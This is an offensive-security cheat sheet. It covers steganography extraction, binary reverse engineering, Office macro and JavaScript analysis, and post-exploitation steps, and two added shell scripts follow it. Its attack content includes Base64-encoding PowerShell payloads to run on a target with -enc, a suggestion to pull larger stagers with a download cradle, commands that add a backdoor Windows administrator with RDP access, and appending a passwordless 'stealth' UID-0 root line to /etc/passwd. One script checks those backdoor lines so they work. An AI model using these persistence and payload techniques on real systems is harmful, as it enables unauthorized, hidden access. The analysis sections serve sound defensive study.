Miscellaneous
Steganography:
Images – Extract Metadata with exiftool (LINK):
> exiftool ~/Downloads/offensive.jpg
Images – Search the file for embedded data (known file signatures) and extract it (-e)
> binwalk ~/Downloads/offensive.jpg [-e]
Images – Look for hidden strings (data appended to an image shows up at the end of the output)
> strings ~/Downloads/offensive.jpg
Images – Extract hidden files
##stegcrack (LINK) is a Python script that drives steghide and recovers the passphrase of a password-protected embedded file with a dictionary attack
> steghide extract -sf offensive.jpg
> stegcrack ./offensive.jpg ./dictionary.txt
Reverse-Engineering:
Print all functions of a binary with radare2:
## aaa: analyze all (flags, functions, cross references)
> r2 example.exe
>> aaa
## afl: list all functions
## pdf / pdc: print disassembly of a function / print C-like pseudo code of a function
>> afl
>> pdf @ functionname
>> pdc @ functionname
## VV: enter visual (graph) mode
## v: open the function list; select a function with the arrow keys, then g loads it into the graph view
>> VV
>> v
>> g
Pull strings from binary:
##Simple but often effective: run strings with different character sizes and endianness, --encoding={s,S,b,B,l,L}
##s = 7-bit, S = 8-bit, b/l = 16-bit big/little endian, B/L = 32-bit big/little endian; plain strings misses the UTF-16LE text that Windows binaries carry, so -e l is usually the interesting run
> strings -e B offensive.exe
Decompile a .NET / C# binary with ILSpy (LINK):
Open binary with ILSpy
Everything else:
Pull macro code from Office documents with olevba (LINK):
> sudo -H pip install -U oletools
> olevba myfile.doc --decode --deobf
Analyze JavaScript with box-js (LINK)
> box-js bad.js
Base64-encode a PowerShell command (-EncodedCommand) to avoid bad characters and quoting problems:
##PowerShell expects the Base64 of the command as UTF-16LE, hence iconv -t UTF-16LE (not UTF-16, which prepends a byte-order mark)
##Execute the encoded payload on the target with powershell -enc; the example blob decodes to "calc.exe"
> cat shell.ps1 | iconv -t UTF-16LE | base64 -w0
> powershell -enc YwBhAGwAYwAuAGUAeABlAAoA
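The encode step above wrapped in a function, plus the reverse direction so an -enc blob found in a log or a scheduled task can be read back. This is an added example, not code from the original page; it assumes iconv and base64 are installed (standard on Kali and any glibc Linux). The "calc.exe" payload is the page's own; the longer Start-Process one-liner is a constructed sample.

```shell
#!/bin/sh
# Added example (not from the original page): encode a PowerShell command for
# -EncodedCommand and decode one back to check what will actually run.
# Assumes iconv and base64 are available.

# base64(UTF-16LE(cmd)) on a single line. UTF-16LE, not UTF-16: the latter
# prepends a byte-order mark (FF FE) that would become part of the command.
ps_encode() {
    printf '%s' "$1" | iconv -f UTF-8 -t UTF-16LE | base64 | tr -d '\n'
}

# Reverse: the command PowerShell will run for a given -enc blob.
ps_decode() {
    printf '%s' "$1" | base64 -d | iconv -f UTF-16LE -t UTF-8
}

# Constructed sample one-liner: quotes, $ and ; would all need escaping on a
# cmd.exe or bash command line, but the encoded form is pure [A-Za-z0-9+/=].
cmd='Start-Process "calc.exe"; Write-Host "$env:USERNAME"'
enc=$(ps_encode "$cmd")
printf 'powershell -NoProfile -enc %s\n' "$enc"
printf 'decodes to: %s\n' "$(ps_decode "$enc")"
```

The encoded form is about 2.7 times the size of the original (two bytes per character, then 4/3 from Base64), and cmd.exe refuses command lines longer than 8191 characters, so anything beyond a short stager should be dropped to disk or pulled with a download cradle instead.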
Create local administrator user (Windows)
##The builtin group names are localized (e.g. "Administratoren" on a German system); net localgroup without arguments lists the names in use on the box
> net user offensiveuser 0ffens!vepassword /add
> net localgroup administrators offensiveuser /add
> net localgroup "Remote Desktop Users" offensiveuser /add
Create local root user (Linux)
##Instead of adduser, append a line to /etc/passwd directly: UID 0 and GID 0 make the account root
##An empty password field means no password at all (accepted where PAM permits empty passwords); leaving GECOS and home empty creates no home directory, for stealth
##Either variant works:
> echo 'offensive::0:0:root:/root:/bin/bash' >> /etc/passwd
> echo 'offensive::0:0:::/bin/bash' >> /etc/passwd
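The trace the append trick leaves behind is a second UID-0 entry, and the one thing that makes it fail is a line with the wrong number of fields. This added example (not from the original page) audits a passwd file for both: it lists every UID-0 account and validates candidate lines before they are appended. The sample passwd content is constructed for the example; point the functions at /etc/passwd to run the check for real.

```shell
#!/bin/sh
# Added example (not from the original page): audit a passwd file for extra
# UID-0 accounts and validate passwd lines before appending them.
# The sample file is constructed here; use /etc/passwd on a real host.

# Print the login names of every entry whose UID (3rd field) is 0.
uid0_accounts() {
    awk -F: '$3 == 0 { printf "%s%s", sep, $1; sep = " " } END { print "" }' "$1"
}

# A passwd line must have exactly 7 colon-separated fields; an entry with the
# wrong count is not parsed as a valid account, so the backdoor simply never works.
valid_passwd_line() {
    n=$(printf '%s\n' "$1" | awk -F: '{ print NF }')
    [ "$n" -eq 7 ]
}

# Constructed sample: a normal system plus the stealth entry from above appended.
write_sample_passwd() {
    cat > "$1" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
offensive::0:0:::/bin/bash
EOF
}

f=$(mktemp)
write_sample_passwd "$f"
echo "UID-0 accounts: $(uid0_accounts "$f")"
for line in 'offensive::0:0:root:/root:/bin/bash' 'offensive::0:0:::/bin/bash' 'offensive::0:0::/bin/bash'; do
    if valid_passwd_line "$line"; then echo "ok   $line"; else echo "BAD  $line"; fi
done
rm -f "$f"
```

The third candidate line has only six fields (one empty field too few between GID and shell) and is rejected; it is the kind of typo that silently turns a working root backdoor into a dead entry.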
Read Outlook mailboxes in Kali:
##apt-get install evolution, or see (LINK); Evolution reads mbox files, so a .pst export has to be converted to mbox first (e.g. with readpst from libpst)
> evolution My.mbox
List Windows directories recursively (example lists everything under a user's directory)
PS > gci -Recurse . | select FullName